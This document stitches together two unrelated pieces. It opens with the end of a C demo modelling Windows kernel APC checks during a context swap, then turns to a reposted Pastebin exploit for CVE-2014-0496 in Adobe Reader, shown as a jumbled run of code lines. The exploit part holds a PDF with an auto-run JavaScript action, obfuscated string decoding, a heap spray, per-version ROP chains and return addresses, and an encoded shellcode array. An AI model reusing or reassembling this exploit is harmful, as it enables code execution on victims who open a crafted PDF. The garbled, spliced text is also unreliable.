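    /* Constructed sample: kernel stack base 0x9C000000 and a pending kernel APC. */
    ModelThread t = { true, 0, PASSIVE_LEVEL, 0x9C000000u };
    SwapResult r = swap_context_apc_check(&t);
    printf("KiExitDispatcher path (WaitIrql=PASSIVE): deliver=%d interrupt=%d\n",
           r.deliver_apcs, r.apc_interrupt_requested);

    t.WaitIrql = APC_LEVEL;  /* what KiQuantumEnd stores in OldThread->WaitIrql */
    r = swap_context_apc_check(&t);
    printf("KiQuantumEnd path (WaitIrql=APC): deliver=%d interrupt=%d\n",
           r.deliver_apcs, r.apc_interrupt_requested);

    printf("TSS Esp0 = 0x%lx\n", (unsigned long)tss_esp0_for(&t));
    return 0;
}
```

Running it shows the two caller conventions side by side: with WaitIrql at PASSIVE_LEVEL the function hands delivery back to the caller, while the APC_LEVEL value KiQuantumEnd supplies never yields TRUE and can only request a software interrupt, exactly the behaviour the special case above describes.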
-
[h=1]CVE-2014-0496 Adobe Pdf Exploit ToolButton[/h] @PhysicalDrive0 }); 1 0 obj 2 0 obj 3 0 obj 4 0 obj 5 0 obj 6 0 obj 7 0 obj aaa += aaa; aa=dd13.split("%u"); aa[i]=str12+aa[i]; /AcroForm 6 0 R addButtonFunc = function () { af1="aaaaa%aaaaaaaauaaaaaa"; af1=af1[("112","a2s1","replace")](/a/g,''); app.addToolButton({ app.addToolButton({ app.alert('123'); app.removeToolButton({ as1211(); bbb += aaa; bbb = bbb.substring(0, i11 / 2); bbb += sa; bbb += str; break; ccc += ccc; cEnable: "addButtonFunc();" cEnable: "removeButtonFunc();" cExec: "1", cExec: "1", cName: "evil" cName: "evil", cName: "xxx", </config> <config xmlns="http://www.xfa.org/schema/xci/2.6/"> /Count 1 dd13=aa.join('%u'); dd13=af1+dd13; dd13=xx13.join('%u'); } else { } else if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) { } else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) { endobj endstream for (i = 0; i < 0x1c / 2; i++) part1 += this[un12]("%u4141"); for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s"; for (i = 0; i < 10; i++) arr[i] = part1.concat(part2); for (i = 0; i < aa[tt1]; i++) for (i = 0; i < part2_len / 2 - 1; i++) part2 += this[un12]("%u4141"); function as1211() function heapSpray(str, str_addr, r_addr) { function opp12(xx13) heapSpray(payload, ret_addr, r_addr); if (app.viewerVersion >= x11 && app.viewerVersion < 10 && app.viewerVersion <= 9.504) { if(ccc[tt] >= (0x40000*2)) if(j) if (!r11) { if (vulnerable) { j=4-aa[i][tt1]; /Kids [3 0 R] <</Length 10074>> <</Length 372>> obj_size = 0x330 + 0x1c; obj_size = 0x360 + 0x1c; obj_size = 0x370; /OpenAction 4 0 R /Pages 2 0 R <pageSet></pageSet> /Parent 2 0 R part1 += rop_addr; %%%%%PDF-6.5 PE/%%%%%% <present><pdf><interactive>1</interactive></pdf></present> r11 = true; r_addr = 0x08a8; r_addr = 0x08e4; r_addr = 0x08e8; removeButtonFunc = function () { ret_addr = this[un12]("%u8003%u4a84"); ret_addr = this[un12]("%ua83e%u4a82"); ret_addr = this[un12]("%ua8df%u4a82"); return; return dd13; 
rop_addr = this[un12]("%u08a8%u0c0c"); rop_addr = this[un12]("%u08e4%u0c0c"); rop_addr = this[un12]("%u08e8%u0c0c"); rop = rop10; rop = rop11; rop = rop9; <</Size 8/Root 1 0 R>> str12=new Array(j+1).join("0"); stream <subform name="form1" layout="tb" locale="en_US"> </subform></template></xdp:xdp> <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/"> trailer tt1=tt1[("112","a2s1","replace")](/a/g,''); tt=tt[("112","a2s1","replace")](/a/g,''); /tYPE/aCTION/S/JavaScript/JS 5 0 R>> /type /Page /Type /Page /Type /Pages un12=''; un12=un12[("112","as1","replace")](/w/g,''); un12="uwnwwewwwswcwwwawwpwe"; var aaa = this[un12]("%u0c0c"); var arr = new Array(); var bbb = aaa.substring(0, i1 / 2); var ccc = bbb.substring(0, i2 / 2); var ddd = ccc.substring(0, 0x80000 - i3); var eee = new Array(); var executable = ""; var i11 = 0x0c0c - 0x24; var i1 = r_addr - 0x24; var i2 = 0x4000 + 0xc000; var i3 = (0x1020 - 0x08) / 2; var obj_size; var part1 = ""; var part2 = ""; var part2_len = obj_size - part1[tt1] * 2; var payload = rop + shellcode; var r11 = false; var r_addr; var ret_addr; var rop; var rop10 = this[("123","1a1",un12)](opp12(xx132)); var rop11 = this[("123","1a1",un12)](opp12(xx131)); var rop9 = this[("123","1a1",un12)](opp12(xx133)); var rop_addr; var sa = str_addr; var shellcode = this[("123","1a1",un12)](opp12(xx134)); var tt1="alaaeaanaaagataaah"; var tt="alaaeaanaagataah"; var vulnerable = true; var xx131=new 
Array(0x822c.toString(16),0x4a85.toString(16),0xf129.toString(16),0x4a82.toString(16),0x597f.toString(16),0x4a85.toString(16),0x6038.toString(16),0x4a86.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5093.toString(16),0x4a85.toString(16),0xbc12.toString(16),0x2946.toString(16),0x0030.toString(16),0x4a85.toString(16),0x597f.toString(16),0x4a85.toString(16),0x0031.toString(16),0x4a85.toString(16),0x8a79.toString(16),0x81ea.toString(16),0x822c.toString(16),0x4a85.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x6030.toString(16),0x4a86.toString(16),0x4864.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4856.toString(16),0x4a81.toString(16),0x05a0.toString(16),0x4a85.toString(16),0x0bc4.toString(16),0x4a86.toString(16),0x05a0.toString(16),0x4a85.toString(16),0xc376.toString(16),0x4a81.toString(16),0x63d0.toString(16),0x4a84.toString(16),0x0400.toString(16),0x0000.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x4864.toString(16),0x4a81.toString(16)); var xx132=new 
Array(0x6015.toString(16),0x4a82.toString(16),0xe090.toString(16),0x4a82.toString(16),0x007d.toString(16),0x4a82.toString(16),0x0038.toString(16),0x4a85.toString(16),0x46d5.toString(16),0x4a82.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5016.toString(16),0x4a80.toString(16),0x420c.toString(16),0x4a84.toString(16),0x4241.toString(16),0x4a81.toString(16),0x007d.toString(16),0x4a82.toString(16),0x6015.toString(16),0x4a82.toString(16),0x0030.toString(16),0x4a85.toString(16),0xb49d.toString(16),0x4a84.toString(16),0x6015.toString(16),0x4a82.toString(16),0x46d5.toString(16),0x4a82.toString(16),0x4197.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4013.toString(16),0x4a81.toString(16),0xe036.toString(16),0x4a84.toString(16),0xa8df.toString(16),0x4a82.toString(16),0xadef.toString(16),0xd2fc.toString(16),0x0400.toString(16),0x0000.toString(16),0xb045.toString(16),0x55c8.toString(16),0x8b31.toString(16),0x4a81.toString(16),0x4197.toString(16),0x4a81.toString(16)); var xx133=new 
Array(0x313d.toString(16),0x4a82.toString(16),0xa713.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x9038.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x155a.toString(16),0x4a80.toString(16),0x3a84.toString(16),0x4a84.toString(16),0xd4de.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x9030.toString(16),0x4a84.toString(16),0x4122.toString(16),0x4a84.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0x3178.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x3a82.toString(16),0x4a84.toString(16),0x6c5e.toString(16),0x4a84.toString(16),0x76ab.toString(16),0x4a84.toString(16),0xfec2.toString(16),0x2bca.toString(16),0x0400.toString(16),0x0000.toString(16),0xaab9.toString(16),0x6d5d.toString(16),0x7984.toString(16),0x4a81.toString(16),0x3178.toString(16),0x4a81.toString(16)); var xx134=new 
Array(0x88bf.toString(16),0xcb87.toString(16),0xdb8d.toString(16),0xd9c8.toString(16),0x2474.toString(16),0x5df4.toString(16),0xc929.toString(16),0x44b1.toString(16),0x7d31.toString(16),0x0314.toString(16),0x147d.toString(16),0xed83.toString(16),0x6afc.toString(16),0x1272.toString(16),0xf166.toString(16),0xd1a4.toString(16),0xf15d.toString(16),0xc866.toString(16),0x8e2c.toString(16),0x25b9.toString(16),0xfb34.toString(16),0x85cb.toString(16),0x8d3e.toString(16),0x6d27.toString(16),0x6d36.toString(16),0x37b3.toString(16),0x06bf.toString(16),0x97bd.toString(16),0x2e34.toString(16),0x977a.toString(16),0x3b52.toString(16),0x7e89.toString(16),0x1262.toString(16),0x6092.toString(16),0x1f04.toString(16),0x4701.toString(16),0x94e1.toString(16),0xbb9f.toString(16),0xfe62.toString(16),0xbc37.toString(16),0x1475.toString(16),0x76cc.toString(16),0x636e.toString(16),0xa689.toString(16),0x988f.toString(16),0x93cd.toString(16),0xd5c6.toString(16),0x5726.toString(16),0x07d9.toString(16),0x9877.toString(16),0x17eb.toString(16),0xca84.toString(16),0x5788.toString(16),0x1401.toString(16),0x9850.toString(16),0x1be7.toString(16),0xcd95.toString(16),0x200c.toString(16),0x3565.toString(16),0x22c5.toString(16),0xbe74.toString(16),0xe94f.toString(16),0x2b77.toString(16),0x7a09.toString(16),0xe07b.toString(16),0x265d.toString(16),0xf798.toString(16),0x5c8a.toString(16),0x7ca4.toString(16),0x8b4d.toString(16),0xc62c.toString(16),0x576a.toString(16),0x054e.toString(16),0x6fc0.toString(16),0x5db9.toString(16),0x95ac.toString(16),0x9f30.toString(16),0xdbc7.toString(16),0x110d.toString(16),0xb6f4.toString(16),0xb279.toString(16),0xc8fb.toString(16),0x4585.toString(16),0x3346.toString(16),0x2bc1.toString(16),0xd991.toString(16),0x5446.toString(16),0x3a3d.toString(16),0xb2fb.toString(16),0xbdb0.toString(16),0xbd04.toString(16),0x0444.toString(16),0x29f3.toString(16),0xeb3b.toString(16),0xe823.toString(16),0xc0ab.toString(16),0xc411.toString(16),0x4f4f.toString(16),0x6b23.toString(16),0xfdf5.toStrin
g(16),0xd743.toString(16),0x0bd1.toString(16),0x01dd.toString(16),0xf34f.toString(16),0xc988.toString(16),0xc9f9.toString(16),0x6a63.toString(16),0x6f51.toString(16),0x30ce.toString(16),0x6c25.toString(16),0x1af5.toString(16),0xecc2.toString(16),0x650a.toString(16),0x87ed.toString(16),0xe19b.toString(16),0x784a.toString(16),0x700c.toString(16),0x1d0c.toString(16),0x1a8e.toString(16),0xb89f.toString(16),0xa97d.toString(16),0x982e.toString(16),0x110a.toString(16),0x1475.toString(16),0x4a82.toString(16),0x701d.toString(16),0xacb4.toString(16),0xe8fe.toString(16),0xfff9.toString(16),0xc9b8.toString(16),0x8d69.toString(16),0x672b.toString(16),0x194a.toString(16),0x5bdb.toString(16),0xbfaa.toString(16),0xec4b.toString(16),0x53cf.toString(16),0xdde0.toString(16),0x23c6.toString(16),0x39b4.toString(16),0xbac9.toString(16),0x73a4.toString(16),0xee3b.toString(16),0x2575.toString(16),0xf1e9.toString(16),0xf4aa.toString(16),0x5dcd.toString(16),0xa2b4.toString(16),0x41c5.toString(16)); vulnerable = false; while (1) while ((aaa[tt] + 28) < (0x8000*2)) aaa += aaa; while (sa[tt] < (xxx - r_addr)) sa += sa; x11=9; <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"> <</XFA 7 0 R>> <?xml version="1.0" encoding="UTF-8"?> xxx=0x0c0c; Sursa: CVE-2014-0496 Adobe Pdf Exploit ToolButton - Pastebin.com